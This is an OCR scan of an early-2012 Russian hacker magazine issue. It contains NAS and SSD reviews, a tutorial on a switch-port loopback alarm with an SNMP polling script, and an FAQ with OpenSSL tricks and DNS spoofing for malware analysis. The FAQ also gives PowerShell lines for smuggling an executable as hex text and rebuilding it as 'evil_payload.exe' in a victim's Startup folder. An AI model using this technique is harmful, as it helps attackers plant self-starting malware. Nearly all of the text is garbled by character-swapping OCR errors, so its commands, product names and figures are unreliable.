2х ЕіЬегпеІ (10/100/1000 Мбит/с), 4х 
115В 2.0, 2хе5АТА 

ШО, РАЮ 0, РАЮ 1, РАЮ 5, РАЮ 6, 
РАЮ 10 

СІР5/5МВ, РТР, ТРРТ, ІІРпР, 01_1\1А, 
НТТР, АРР, ИР5, Вопіоиг, І5С5І 



Іпіеі Аіот 0525, 1,8 ГГц 
ОйРЗ 500ІММ 1x1 Гбайт 
2х ЕНтегпеІ (10/100/1000 
Мбит/с), 5х 115В 2.0, е5АТА 
Шй, РАЮ 0, РАЮ 1, РАЮ 5, 
РАЮ 6, РАЮ 10 
СІР5/5МВ, РТРДРРТ, ІІРпР, 
НИР, АРР, ИР5, Вопіоиг, І5С5І 



РАЗДАЕМ МЕДАЛЬКИ 

Первое, что заставляет задуматься, — это высокая 
цена устройств без жестких дисков. Поэтому нужно 
точно решить, нужен ли тебе ЫА5, тем более 5- или 
6-дисковый. Но если ты решил, что нужен, тогда 
самым лучшим выбором станут модели от ОЫАР, 
5упоІоду и ТЬесиз. Первый получает от нашего жур- 
нала почетную награду «Выбор редакции». Звание 
«Лучшая покупка» мы присвоили хранилищу 
компании ЫЕТСЕАР. Цена этого ЫА5 не так велика 
(по сравнению с другими устройствами), а его про- 
изводительность находится на должном уровне, і 
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РЕККІІМ 



Александр Михеев 



СО СКОРОСТЬЮ 

ТЕСТИРОВАНИЕ ТВЕРДОТЕЛЬНОГО 
■ ■ ЖЖ НАКОПИТЕЛЯ 5ІЫС0Ы РОѴѴЕР 

5Р0600В550Ѵ30525 




Тип: 550, 2,5 дюйма 

Интерфейс: 5АТА 3.0 
Тип ячеек: МІ_С 

Макс, скорость чтения: 550 Мб/с 
Макс, скорость записи: 500 Мб/с 
Объем: 60 Гб 
Поддержка ТКІМ: есть 



ПЛЮСЫ И МИНУСЫ: 



+ высокая скорость 
+ высокая надежность 
+ низкая стоимость 
- малый объем 

Цены на 550, к сожалению, 
еще не упали настолько, чтобы 
каждый мог позволить себе 
«твердотельное хранилище» 
на полтерабайта. Однако 
самые любопытные уже сейчас 
могут попробовать скоростную 
альтернативу винчестерам — 550 
небольшого объема как раз под 
системный диск. На эту роль 
отлично подойдет 5іІісоп Роѵѵег 
5Р0600В550Ѵ30525. Кому-то и 
60 Гб мало, но для ѴѴіпсІоѵѵз 7 и 
набора всевозможных программ 
этого вполне хватит, только вот 
игры влезутлишь избранные. 




Ютеіег: 

Капсіот геасі 4 Кб: 21,44 Мб/с 
Папсіот ѵѵгііе 4 Кб: 19,77 Мб/с 
Бед. геасі 128 Кбайт: 313,41 Мб/с 
Бед. ѵѵгііе 128 Кбайт: 332 Мб/с 
Ютеіег раНегпз: 
йаІаЬазе: 36,43 Мб/с 
Рііезегѵег: 41,08 Мб/с 
ѴѴогкБІаІіоп: 34,50 Мб/с 
ѴѴеЬзегѵег: 51,35 Мб/с 

РСМагкѴапІаде: 

Тезі Биііе: 26076 баллов 

ѴѴіпсІоѵѵз йеіепііег: 42,95 Мб/с 
Оатіпд: 176,73 Мб/с 
Ітрогііпд рісіигез Іо ѴѴіпсІоѵѵз 
РІіоЮ баііегу: 271,45 Мб/с 
ѴѴіпсІоѵѵэѴізІа эіагіир: 30,18 Мб/с 
Ѵісіео есііііпд изіпд ѴѴіпсІоѵѵз Моѵіе 
Макег: 88,42 Мб/с 
ѴѴіпсІоѵѵз Месііа Сепіег: 

340,73 Мб/с 

Асісііпд тизіс (о ѴѴіпсІоѵѵз Месііа 
РІауег: 151,54 Мб/с 
Арріісаііоп Іоасііпд: 167,14 Мб/с 
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Воистину великолепные результаты тестирования! 



МЕТОДИКА ТЕСТИРОВАНИЯ 

Так как одной из главных характеристик твердо- 
тельных накопителей является скорость, то ее мы 
измеряли особенно тщательно. Мы использовали 
старый добрый бенчмарк ІОтеІег, который гонял 
550 как в режиме последовательного чтения/ 
записи, так и в режиме случайного. Также мы 
запускали специальные паттерны ІОтеІег'а, 
имитирующие нагрузку на накопитель в условиях 
эксплуатации в составе файлового сервера, ра- 
бочей станции и т. п. Следом шел РСМагк Ѵапіаде, 
а точнее его подтест РЮО, который тоже имити- 
рует нагрузку в разных условиях, но они немного 
ближе к тем, с которыми встречаются ПК рядовых 
пользователей. И наконец, с помощью АТТО йізк 
ВепсЬтагк мы проверяли скорость последова- 
тельного чтения/записи для блоков данных от 
0,5 до 8192 Кб. Этот бенчмарк всегда показывает 
потрясающие результаты, но в реальной жизни 
накопители почти никогда их не достигают. 

ВСТРЕЧАЕМ 

Итак, новинка работает на контроллере 5апсІРогсе 
серии 5Р-2000 и использует ячейки памяти типа 
МІ_С. Срок жизни последних составляет всего 
3-5 тысяч циклов перезаписи, но производитель 
обещает до пяти лет беспроблемной работы. 

5іІісоп Роѵѵег 5Р060СВ550Ѵ30525 подойдеттем, 
кто уже успел обзавестись системной платой с 
5АТА 3.0, иначе заветные скоростные характери- 
стики останутся лишь двумя привлекательными 
циферками на упаковке. Конечно, в реальности 
их можно достичь только при синтетических 
тестах, но и в ходе более серьезных испытаний, 
например при тестировании в бенчмарке ІОтеІег, 
новый накопитель показал себя очень шустрым. 
Комплектация 5іІісоп Роѵѵег 5Р0606В550Ѵ30525 
вполне стандартная: гид по быстрой установке и 
кронштейн для монтирования в 3,5-дюймовом от- 
секе. Если тебе вдруг очень понравится этот 55й, 
ты всегда можешь продать почку и купить модель 
с максимальным в линейке объемом 480 Гб. 

ВЫВОДЫ 

Если у тебя еще нет твердотельного накопителя, то 
мы не видим причин, по которым нельзя побаловать 
себя такой покупкой. Благодаря тому же 5іІісоп 
Роѵѵег 5Р060СВ550Ѵ30525, система реально уско- 
ряется! Ради такого ускорения не жалко потратить 
достаточно большую сумму. НС 
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реклама 



Почти 3 000 000* настоящих мужчин 

смотрят МАМ ТѴ 



По данным исследования ТѴ Іпсіех РІиз, Россия, население 4+ (ТЫЗ Россия), декабрь 201 0 - февраль 201 1 , накопленный охват (Ксіі) 



РНКЕАКШ6 



Сергей Лунде ака Ьишіез (зегдеу.іипсіеісідтаіі.сот] 




Если взять кусок патч-корда и воткнуть оба 
хвоста в один коммутатор, то получится петля. 
И в целом петля на порте коммутатора или 
сетевой карты — зло. Но если постараться, 
то и этому явлению можно найти полезное 
применение, например сделать сигнализацию 
с тревожной кнопкой. 

П ипичная сеть состоит из узлов, соединенных средой пере- 
дачи данных и специализированным сетевым оборудо- 
ванием, таким как маршрутизаторы, концентраторы или 
коммутаторы. Все эти компоненты сети, работая вместе, позволяют 
пользователям пересылать данные с одного компьютера на другой, 
возможно в другую часть света. 

Коммутаторы являются основными компонентами большинства 
проводных сетей. Управляемые коммутаторы делят сеть на отдель- 
ные логические подсети, ограничивают доступ из одной подсети в 
другую и устраняют ошибки в сети (коллизии). 

Петли, штормы и порты — это не только морские термины. Пет- 
лей называют ситуацию, когда устройство получает тот же самый 



сигнал, который отправляет. Представь, что устройство «кричит» 
себе в порт: «Я здесь!» — слушает и получает в ответ: «Я здесь!». 
Оно по-детски наивно радуется: есть соседи! Потом оно кричит: 
«Привет! Лови пакет данных!» — «Поймал?» — «Поймал!» — «И ты 
лови пакет данных! Поймал?» — «Конечно, дружище!» 

Вот такой сумасшедший разговор с самим собой может начаться 
из-за петли на порте коммутатора. 

Такого быть не должно, но на практике петли по ошибке или 
недосмотру возникают сплошь и рядом, особенно при построении 
крупных сетей. Кто-нибудь неверно прописал марштуры и хосты 
на соседних коммутаторах, и вот уже пакет вернулся обратно и за- 
циклил устройство. Все коммутаторы в сети, через которые летают 
пакеты данных, начинает штормить. Такое явление называется 
широковещательным штормом (Ьгоасісазі зіогт). 

Меня удивил случай, когда установщик цифрового телевидения 
воттак подсоединил патч-корд (рис. 1). «Куда-то же он должен 
быть воткнут...» — беспомощно лепетал он. 

Однако не всё так страшно. Почти в каждом приличном комму- 
таторе есть функция Іоор_беІесЛоп, которая защищает устройство 
и его порт от перегрузок в случае возникновения петли. 



НАСТРАИВАЕМ КОММУТАТОРЫ 



Перед тем как начинать настройку, необходимо установить фи- 
зическое соединение между коммутатором и рабочей станцией. 



132 



ХАКЕР 01 /156/2012 






І_оор во благо 





1 ТХ+ 


Бело-оранжевый. Исходящ. данные + 


2ТХ- 


Оранжевый. Исходящ. данные - 


3 РХ+ 


Бело-зеленый. Передача данных + 


4 п/с 


Синий, (не используется] 


5 п/с 


Бело-синий, (не используется] 


6 — 


Зеленый. Передача данных - 


7 п/с 


Бело-коричневый, (не используется) 


8 п/с 


Коричневый, (не используется] 



Таблица 1. Распиновка 1^45 

Существует два типа кабельных соединений для управления ком- 
мутатором: соединение через консольный порт (если он имеется 
уустройства) и через порт ЕіЬегпеІ (по протоколу Теіпеі или через 
ѵѵеЬ-интерфейс]. Консольный порт используется для первона- 
чального конфигурирования коммутатора и обычно не требует на- 
стройки. Для того чтобы получить доступ к коммутатору через порт 
ЕіЬегпеІ, устройству необходимо назначить ІР-адрес. 

ѴѴеЬ-интерфейс является альтернативой командной строке и 
отображает в режиме реального времени подробную информацию 
о состоянии портов, модулей, ихтипе и т. д. Как правило, ѵѵеЬ- 
интерфейс живет на 80 НТТР-порте ІР-коммутатора. 



НАСТРОЙКА ОШК ОЕ5-3200 



Для того чтобы подключиться к НТТР-серверу, необходимо выпол- 
нить перечисленные ниже действия с использованием интерфейса 
командной строки. 

1. Назначить коммутатору ІР-адрес из диапазона адресов твоей 
сети с помощью следующей команды: 

ОЕ5-3200# сопб§ ^ІТ БузТет \ 

ірасИгезБ ххх.ххх.ххх.ххх/ууу . ууу . ууу.ууу. 

Здесь ххх. ххх. ххх.ххх — ІР-адрес, УУУ-УУУ-УУУ-УУУ- — маска подсети. 

2 . Проверить, правильно л и задан ІР-адрес коммутатора, с помо- 
щью следующей команды: 

РЕ5-3200# 5Ьоц Ірі-Р 

3. Запустить на рабочей станции ѵѵеЬ-браузер и ввести в его ко- 
мандной строке ІР-адрес коммутатора. 

Управляемые коммутаторы й-Ыпк имеют консольный порт, ко- 
торый с помощью кабеля Р5-232, входящего в комплект поставки, 
подключается к последовательному порту компьютера. Подключе- 
ние по консоли иногда называют подключением ОиІ-оі-ВапсІ. Его 
можно использовать для установки коммутатора и управления им, 
даже если нет подключения к сети. 

После подключения к консольному порту следует запустить 
эмулятор терминала (например, программу НурегТегтіпаІ в 
ѴѴіпсІоѵѵз). В программе необходимо задать следующие параметры: 

ВаисІ га1:е: 9,600 
Ра1:а ѵ^ісИсМ : 8 ЬіТб 
Р аггЬу: попе 
51=ор Ы1=5 : 1 
Ріоы Сопіігоі: попе 



При соединении коммутатора с консолью появится окно 
командной строки. Если оно не появилось, нажми СігІ+г, чтобы 
обновить окно. 

Коммутатор предложит ввести пароль. Первоначально имя 
пользователя и пароль не заданы, поэтому смело жми клавишу 




Рис. 1. Синий свитч с петлей на борту 




І_оорЬаск-тест 

Епіег два раза. После этого в командной строке появится пригла- 
шение, например ОЕ5-3200#. Теперь можно вводить команды. 

Команды бывают сложными, многоуровневыми, с множеством 
параметров, и простыми, для которых требуется всего один параметр. 
Введи «?» в командной строке, чтобы вывести на экран список всех 
команд данного уровня или узнать параметры команды. 

Например, если надо узнать синтаксис команды сопіпд, введи в 
командной строке: 
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РЕ5-3200#соп6ег + пробел 

Далее можно ввести «?» или нажать кнопку Епіег. На экране 
появится список всех возможных способов завершения команды. 
Лично я для вывода этого списка на экран пользуюсь клавишей ТАВ. 



БАЗОВАЯ КОНФИГУРАЦИЯ КОММУТАТОРА 



При создании конфигурации коммутатора прежде всего необ- 
ходимо обеспечить защиту от доступа к нему неавторизованных 
пользователей. Самый простой способ обеспечения безопасно- 
сти — создание учетных записей для пользователей с соответ- 
ствующими правами. Для учетной записи пользователя можно 
задать один из двух уровней привилегий: Асітіп или ІІзег. Учетная 
запись Асітіп имеет наивысший уровень привилегий. Создать 
учетную запись пользователя можно с помощью следующих 
команд СИ: 

РЕ5-3200# сгеаіе ассоипі асітіп/изег <изегпате> 

(знак «/» означает ввод одного из двух параметров) 

После этого на экране появится приглашение для ввода пароля 
и его подтверждения: «Епіег а сазе-зепзіііѵе пеѵѵ раззѵѵогсі». 
Максимальная длина имени пользователя и пароля составляет 15 
символов. После успешного создания учетной записи на экране 
появится слово Биссезз. 

Ниже приведен пример создания учетной записи с уровнем при- 
вилегий Асітіп: 

ІІзегпате "сіііпк" : 

РЕ5-32ѲѲ#сгеаіе ассоипі: асітіп сіііпк 
СоттапсІ: сгеаііе ассоипі: асітіп сіііпк 
Епііеп а сазе-зепзіііѵе пем раззіюгсі: **** 

Епіег ібе пем раззмогсі а§аіп -Рог сопбгтаііоп : **** 

Биссезз . 

РЕ5-3200# 



Изменить пароль для существующей учетной записи пользо- 
вателя можно с помощью следующей команды: ОЕ5-3200# сопРід 
ассоипі <изегпате> 

Ниже приведен пример установки нового пароля для учетной 
записи сіііпк: 

РЕ5-3200#сопб§ ассоипі: сіііпк 
СоттапсІ: сопб% ассоипі сіііпк 
Епіег а оісі раззмогсі : **** 

Епіег а сазе-зепзіііѵе пем раззмогсі : **** 

Епіег ібе пем раззмогсі а§аіп -Рог сопбгтаііоп : **** 
Биссезз. 

Проверка созданной учетной записи выполняется с по- 
мощью следующей команды: РЕ5-3200# зЬоѵѵ ассоипі. Для 



удаления учетной записи используется команда беіеіе ассоипі 
<изегпате>. 

Шаг второй. Чтобы коммутатором можно было удаленно управ- 
лять через ѵѵеЬ-интерфейс или Теіпеі, коммутатору необходимо 
назначить ІР-адрес из адресного пространства сети, в которой 
планируется использовать устройство. ІР-адрес задается автома- 
тически с помощью протоколов йНСР или ВООТР или статически с 
помощью следующих команд СИ: 

РЕ5-3200# сопб§ ірі-р Бузііет сІНіср ^ 

РЕ5-3200# сопб^ ірі-Р Бѵзіет ірасісігезз \ 
ххх . ххх . ххх . ххх/ууу . ууу . ууу . ууу . 

Здесь ххх. ххх. ххх. ххх — ІР-адрес, УУУ-УУУ-УУУ-УУУ- — маска подсети, 
Бузіет — имя управляющего интерфейса коммутатора. 

Шаг третий. Теперь нужно настроить параметры портов 
коммутатора. По умолчанию порты всех коммутаторов й-Ыпк 
поддерживают автоматическое определение скорости и режима 
работы (дуплекса). Но иногда автоопределение производится 
некорректно, в результате чего требуется устанавливать ско- 
рость и режим вручную. 

Для установки параметров портов на коммутаторе й-Ыпк 
служит команда сопіід рогіз. Ниже я привел пример, в котором 
показано, как установить скорость 10 Мбит/с, дуплексный режим 
работы и состояние для портов коммутатора 1-3 и перевести их в 
режим обучения. 

РЕ5-3200#сопб§ рогіз 1-3 зреесі 10_іи11 1еагпіп§ 
епаЫе зіаіе епаЫе 

СоттапсІ: сопб^ рогіз 1-3 зреесі 10 іи 11 Іеагпіп^ 

епаЫе зіаіе епаЫе 

Бисс езз 

Команда зЬоѵѵ рогіз <список портов> выводит на экран инфор- 
мацию о настройках портов коммутатора. 

Шаг четвертый. Сохранение текущей конфигурации коммута- 
тора в энергонезависимой памяти ІЧѴРАМ. Для этого необходимо 
выполнить команду заѵе: 

РЕ5-3200#заѵе 



КОММУТАТОРЫ В СЕТИ, 
ЧЕРЕЗ КОТОРЫЕ ЛЕТАЮТ 
ПАКЕТЫ ДАННЫХ, НАЧИНАЕТ 
ШТОРМИТЬ 
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СоттапсІ: заѵе 



5аѵіп§ аіі зеіііііп^з Ііо ІМѴ-КАМ. . 


. 100% 


сіопе. 




РЕ5-3200# 





Шаг пятый. Перезагрузка коммутатора с помощью команды 
геЬооІ: 

РЕ5 -32ѲѲ# геЬ оо 1= 

СоттапсІ: пеЬооІ: 

Будь внимателен! Восстановление заводских настроек комму- 
татора выполняется с помощью команды гезеі. 

ОЕ5-3200#ге5еІ сопПд 

А то я знал одного горе-админа, который перезагружал комму- 
таторы командой гезеі, тем самым стирая все настройки. 

1оор_сіе1:ес1:іоп для коммутаторов Аісаѣеі 

іпіегРасе гап%е е1=Иегпе1= е(1-24) 

ІоорЬаск-сІеІіесІііоп епаЫе 
ехіі: 

ІоорЬаск-сІеІіесІііоп епаЫе 

1оор_сіе1:ес1:іоп для коммутаторов Рііпк 

епаЫе Іоорсіеііесі: 

сопб§ Іоорсіеііесі: гесоѵег_іітеп 1800 

сопб§ Іоорсіеііесі: іпіегѵаі 1 

сопб^ Іоорсіеііесі: тосіе ропІі-ЬаБесІ 

сопб% Іоорсіеііесі: Іігар попе 

сопб§ Іоорсіеііесі: рогііз 1-24 зііаііе епаЬІесІ 

сопб§ Іоорсіеііесіі рогііз 25-26 зііаііе сІізаЬІесІ 

Грамотный админ обязательно установит на каждом порте соот- 
ветствующую защиту. 

Но сегодня мы хотим применить ІоорЬаск во благо. У такого 
включения есть замечательное свойство. Если на порте ком- 
мутатора имеется петля, устройство считает, что к нему что-то 
подключено, и переходит в ІІР-состояние, или, как еще говорят, 
«порт поднимается». Вот эта-то фишка нам с тобой и нужна. 



УСТРАИВАЕМ АППАРАТНУЮ ПЕТЛЮ 



Устроить обратную связь очень просто: соединяется канал приема 
и передачи, вход с выходом (Рх и Тх). 

Обожми один конец кабеля стандартно, а при обжиме второго 
замкни жилы 2 и 6, а также 1 и 3. Если жилы имеют стандартную 
расцветку, надо замкнуть оранжевую с зеленой, а бело-оранжевую 
с бело-зеленой. Смотри рис. 3. 

Теперь, если воткнешь такой «хвостик» в порт коммутатора или 
в свою же сетевую карту, загорится зелёненький сигнал Ііпк. Ура! 
Порт определил наше «устройство»! 



КРАСНАЯ КНОПКА, ИЛИ НЕНО УУОРЮ 



Ну куда же без НеІІо ѵѵогісі? Каждый должен хоть раз в жизни вы- 
вести эти слова на экран монитора! Сейчас мы стобой напишем 
простейший обработчик событий, который будет срабатывать при 
замыкании красной кнопки. Для этого нам понадобятся только 
кнопка с двумя парами контактов, работающих на замыкание, 
витая пара и коннектор. На всякий случай приведу схему красной 
кнопки (рис. 4). 

Паяльник в руках держать умеешь? Соединяем так, чтобы одна 
пара контактов замыкала оранжевую жилу с зеленой, а другая — 
бело-оранжевую с бело-зеленой. На всяких случай прозвони 
соединение мультиметром. 

Все, теперь можно тестировать. Вставь обжатую часть в порт 
сетевой карты или в порт коммутатора. Ничего не произошло? 
Хорошо. Нажми кнопку. Линк поднялся? Замечательно! 

Вот листинг простейшего обработчика НеІІо ѴѴогІсІ на СзЬеІІ: 



ШОРВАСК 



И оор — это аппаратный или программный метод, который по- 
зволяет направлять полученный сигнал или данные обратно 
отправителю. На этом методе основан тест, который называется 
ІоорЬаск-тест. Для его выполнения необходимо соединить выход устройства 
с его же входом. Смотри фото «ІоорЬаск-тест». Если устройство получает 
свой собственный сигнал обратно, это означает, что цепь функционирует, то 
есть приемник, передатчик и линия связи исправны. 



Скрипт на СзИеІІ. генерящий НеІІо могсі 

#! /Ьіп/сзіп 

# ѵег. 1.0 

# Проверяем, запущен ли процесс в памяти 

і-р ( ' рз | §гер ' песІЬиІ: ' | §гер -ѵ ' §гер' | ыс -1' <= 1 ) 
Ііііеп 

# Указываем путь, где лежит зптр 

зеіі зптрсііг = "/изг/ІосаІ/Ьіп/" 

зеі: соттипіііу =^'риЫіс" 

# Строка зптр 

зеіі зптрстсі = "-1:1 -гі -Орѵ -с $соттипі1іу -ѵі -С-Р " 

5е1і тіЬ зііаі: = "ІР-МІВ: : і-РОрегБІіаІіиз .$2" 
зеіі иісі = "$1" 
зеіі Р1 = '0' 

# Запускаем цикл проверки порта 

мбііе ( "$Р1" == '0' ). 

зеіі поызііаііиз = ’$зптрсІіг/5птр§е1і $зптрстсІ $иісІ 
$тіЬ_з1іа1і | зесі ' з/ир/1/ ; з/сіоып/Ѳ/ ; /Ыгоп^[/сІ ' ' 
і-р ( "$помз1іа1:и5" == 1 ) ІІіеп 
есбо 'НеІІо ІлІогІсГ 

# Отправляем сообщение на е-таіі 

есбо "Сработала красная кнопка! НеІІо Іліопісі!" | 

зепсітаіі --р[от_кого_отправлено] [кому_отправляем] 



епсІіЛ 
зіеер 10 
епсі 
епсіі-р 
ехіі: 



Скрипт запускается с помощью следующей строки: 

. /зсгіріі. сзіі ІР коммѵтатора номер порта. 

Что привязать к обработчику событий, зависит уже оттвоей 
фантазии. Может, это будет счетчик гостей, или тревожная кнопка, 
рассылающая сообщения в аське, или кнопка для отключения всех 
юзеров в сети — решать тебе! 



СИГНАЛИЗАЦИЯ ОБРЫВА ВИТОЙ ПАРЫ 



Я решил собрать аппаратную петлю после того, как в моей локаль- 
ной сети украли несколько мешков витой пары. Встал серьезный 
вопрос: как мониторить витую пару? 

Идея проста: надо проложить витую пару от коммутатора до 
подъезда и на конце замкнуть её в петлю. Это будет «растяжка», 
при обрыве которой исчезнет линк на порте коммутатора. Оста- 
нется написать обработчик, который бы «трубил во все трубы», что 
линк исчез, то есть витую пару кто-то разрезал. 

Чуть не забыл! В конфигурации коммутатора необходимо снять 
защиту Іоор_беІесІіоп с порта, на котором установлена «растяжка». 

Впрочем, ты можешь придумать петле и другое применение. 
Удачи! НС 
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ІЖІТ5/РАСШМІТЕ0 



Степан Ильин (іѵѵІіКег.сот/зІераЫ 



РАО ІІпіІесІ 

ЕСТЬ ВОПРОСЫ — ПРИСЫЛАЙ 
НА РАО(аКЕАЬ.ХАКЕР.Ки 




□ КАК БЫ ТЫ ЗАШИФРОВАЛ 
НЕКОТОРЫЕ ДАННЫЕ ДЛЯ 
ПЕРЕДАЧИ НАУДАЛЕННОМ иЫІІХ- 
СЕРВЕРЕ? 

□ Я бы сделал это через ОрепББЫ Да-да, 
этот демон есть практически в любой 
Ыпих-системе, но при этом его возможности 
далеко не ограничиваются поддержанием 
БББ-соединения. Хочу поделиться с тобой 
несколькими полезными трюками, которые 
наверняка тебе не раз пригодятся. Так, 
с помощью ОрепБББ ты можешь шифровать 
и дешифровать данные, проверять целост- 
ность файла, определять, какие протоколы 
шифрования и шифры поддерживает удален- 
ный сервер, а также замерять скорость 
соединения. 

1. Начнем с шифрования. В твоей ситуации 
можнобылобы использоватьвполне 
тривиальные решения вроде ОпиРО ( ѵѵѵѵѵѵ. 
апира.ога ). но с задачей отлично справится 
и ОрепБББ: 

$ орепззі ае5-25б-сЬс -заіі: -іп 
біе-ііезі: -ой! біе-іезі: . аез 
епіег аез-256-сЬс епсгурііоп разз- 
ыогсі : 

Ѵегі-Рѵіп^ - егтЕег аез-256-сЬс 
епсгуріііоп раззмогсі: 

В данном случае мы шифруем файл ЛІе- 
Іезі с помощью АЕ5-256 (в режиме СВС) 
и записываем его в ЛІе-ІезІ.аез. При этом 



ОрепБББ дважды спрашивает пароль. 
Далее он потребуется для дешифрования 
файла, которое выполняется следующим 
образом: 

$ орепззі аез-256-сЬс -сі -іп \ 
біе-іезіі.аез -оиі: біе-ііезіі-сіес 



К сожалению, возможности ОреепБББ 
позволяют шифровать только один файл, 
поэтому для шифрования нескольких при- 
дется предварительно их сжать или же на- 
писать простой ЬазЬ-скрипт. Вот, к приме- 
ру, небольшой сценарий, который шифрует 
все файлы в текущей директории: 

$ -Рог -Р іп * ; сіо [ --Р ] && орепззі 

аез-256-сЬс -заіі: -іп $-Р -оиі: $-Р.епс 
-раз5 б1е:раззыогсІ.1:х1: ; сіопе 

2 . Генерацияхеша. ОрепБББ пригодится и втом 
случае, если нужносгенерировать5НА1-1- 
или М 05 -хеш и. Вычислим 5НА1 для файла 
ЛІе-ІезІ-64: 

$ орепззі зііаі б1е-1:е5І:-64 
5НА1(еаро1-64)= а-Рс594-Р26са08780737 
69сІ24-Р8с04-Ре35-Р2Ы : 8ЬЗ 

3. Чтобы выяснить, какую версиюББЕ/ИБ 
поддерживаетудаленный сервер, можно 
опять же воспользоваться ОрепБББ. Это 
легко делается с помощью следующей 
команды: 



$ есбо 'СЕТ НТТР/1^0' | орепззі з_с1іеп1: 
-соппесі ехатр1е.сот:443 
[ •••] 

Ыем. ТІ_5ѵ1/55І.ѵЗ. СірНеп із 

ОНЕ-К5А-АЕ5256-5НА 

Зепѵеп риЫіс кеу із 2048 Ьіім 

Как мы видим, хост поддерживает И5 у 1/ 
БББѵЗ. 

4 . В ОрепБББтакже встроен собственный 
зреесі Іезі, позволяющий за мерить скорость 
удаленного соединения. Простейший бенч- 
марк за пускается так: 

$ орепззі з ііте -соппесі \ 
ыеЬзегѵег . сот: 443 

ПОДСКАЖИ КАКОЙ-НИБУДЬ 
СВЕЖИЙ СПОСОБ ПЕРЕНЕСТИ 
ИСПОЛНЯЕМЫЙ ФАЙЛ НАУДАЛЕННУЮ 
СИСТЕМУ, ЕСЛИ НИ ОДИН ИЗ ПРИВЫЧНЫХ 
СПОСОБОВ (ЕТР.ЕХЕ, БРАУЗЕР И Т. Д.) 
НЕДОСТУПЕН. 

В одном из номеров журнала мы уже 
рассказывали о том, как собрать 
исполняемый файл из текстового документа 
с помощью беЬид.ехе. Однако такой способ 
накладывает ограничение в 64 Кб на размер 
исполняемого файла. Более того, беЬид.ехе 
не входит в последние версии ОС от Місгозоіі. 
К счастью, в ѴѴіпсІоѵѵз 7 и Бегѵег 2008 по умол- 
чанию имеется РоѵѵегБЬеІІ, который предо- 





5 ШАГОВ: СПУФИНГ ОИБ-ОТВЕТОВ ДЛЯ АНАЛИЗА МАЛВАРИ 



очу перехватывать все подключения 
зловреда к его С&С-серверам. Нужно 
проспуфить РЫБ-ответы так, чтобы 
в качестве ІР-адресов своих доменов малварь 
получала заданный мною айпишник. Как это 
проще сделать? Не снифать же вручную все 
имена доменов, к которым происходят 
обращения, добавляя их вручную в файл Ьозіз? 



ВШР ( ѵѵѵѵѵѵ.ізс.огд ). 

С подменой РЫБ-ответов отлично 
справится правильно сконфигуриро- 
ванный РЫБ-сервер, например В I N 0, кото- 
рый работает как под виндой, так и никсами. 

С другой стороны, это все равно, что стрелять 
из пушки по воробьям. Легче заюзать специ- 
альную тулзу для спуфинга РЫБ-ответов. 



АраІейМБ (МЩШ). 

Эту утилиту недавно выпустила из- 
вестная зесигііу-компанией МапсМапі. 
Она принимает РЫБ-запросы и отправляет 
ответы с тем ІР-адресом, который ты указал. 
Чтобы все работало, хост, на котором запу- 
щен АраІеОЫБ (работает только под виндой), 
должен быть указан на исследуемых машинах 
в качестве РЫБ. 
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РАСОІІМІТЕО 



ставляет баснословные возможности прямо 
из командной строки. Что мы можем сделать? 
Взять текстовый файл с шестнадцатеричным 
представлением исполняемого файла 
и перевести его в настоящий бинарник. Можно 
без труда оформить бинарник в виде «тексто- 
вика» с помощью простейшего скрипта в том 
числе на том же самом РоѵѵегЗЬеІІ: 

Р5 > [ Ьу1=е [ ] ] $1іех = ^е1=-соп1=еп1= 

-епсосІіп§ Ьу1:е -раѣіі 

С : \1:етр\еѵі1_рау1оасІ . ехе 

Р5 > [Бузует .10. Рііе] : :Мгі1:еА11І_іпе5( "С : \ 

ІіетрМіехсІитр.ІіхІ:" . ( [з1:гіп^]$1іех) ) 

Первая строка считывает каждый байт 
экзешника и сохраняет его в массиве. Вторая 
строка переводит байты в массив строк и за- 
писывает их в текстовый файл. В результате 
в файле Ьехбштр.М у нас получается что-то 
вроде этого: 
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БОЛЬШОЙ ВОПРОС 



КАК МОЖНО ПОЩУПАТЬ 
АЫЬ ПОЮ- ПРИЛОЖЕН ИЯ, 

НЕ ИМЕЯ ТЕЛЕФОНА 
С АЫОПОЮ? Я ЗНАЮ ПРО СТАНДАРТ- 
НЫЙ ЭМУЛЯТОР ОТ ООООЬЕ, НО УЖ 
БОЛЬНО ОН ТОРМОЗНОЙ! 



Эмулятор АпбоісГ а, входящий 
в АпбгоісІ 5йК, действительно 
медленный, так как он вынуж- 
ден эмулировать настоящий процессор 
архитектуры АРМ поверх процессора 
х86. Из-за этого в плане производитель- 
ности возникает довольно существенный 
оверхед в. На твое счастье, в мире есть 
талантливые извращенцы, у которых 
полно сил на реализацию довольно 
странных проектов вроде Віиезііаскз 
( Ыие5Іаск5.сот ). Это не эмулятор, а пол- 
ностью воссозданное АпбгоісІ-окружение, 




которое позволяет запускать АпбгоісІ- 
приложения. На практике это дает массу 
преимуществ. К примеру, ты можешь 
запускать приложения в полноэкранном 
режиме, и они реально не будуттормо- 
зить. Платформа позволяет запускать 
десять приложений, которые идут с ней 
в комплекте, а также устанавливать до- 
полнительные. Примечательно, что это 
не просто проект энтузиастов, а финанси- 
руемый инвесторами стартап. На данный 
момент Віиезііаскз уже привлек инвести- 
ции примерно на 7 млн долларов. Помимо 
этого, существует также открытый проект 
по портированию АпбгоісІ на процессо- 
ры х86 [ ѵѵѵѵ\л/.апсІгоісІ-х86.ога ]. который 
постоянно радует нас новыми версиями. 
Для установки я использовал подробный 
мануал с офсайта [ Нир://ЬіЫѵ/гУ590І 1. 
и все сразу заработало! 



Передать текстовый файл намного проще, 
чем бинарный. В крайнем случае (если пред- 
положить, что компьютер не имеет доступа 
в сеть и к нему нельзя подключить внешние 
носители), злоумышленник может создать 
такой файл вручную (хотя мучиться он будет 
довольно долго). Реконструировать файл об- 
ратно в бинарник на целевой системе можно 
с помощью такого Р5-сценария: 

Р5 > [з1=гіп §]$1іех = ^е1=-соігЬ еп1= - ра1:Ь 
С : \ІІзепз\ѵіс1:іт\0е5к1:ор\ІіехсІитр.1:х1: 

Р5 > [Ву1=е[ ] ] $1=етр = $1іех -зрШ: ' ' 

Р5 > [Бѵзііет ЛО. Рііе] : :1лІгі1:еА11Ву1=е5( 

"С : ХРго^гатРаІіаХМісгозо-РііМлІіпсІоызХБІіагІ: 
Мепи\Рго§гатз\51:аг1:ир\еѵі1_рау1оасІ . ехе" . 
$1:етр) 

Первая строка считывает дамп в строко- 
вую переменную, далее строка с помощью 
пробела разделяется на байты. В конце 
концов массив байтов записывается в файл — 
и мы получаем исходный бинарник, готовый 
к исполнению. 
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АпсігоісІ-х86, запущенный под ѴИиаВох, на хорошем компьютере работает примерно в два раза быстрее, чем 
смартфон Ыехиз Опе! 



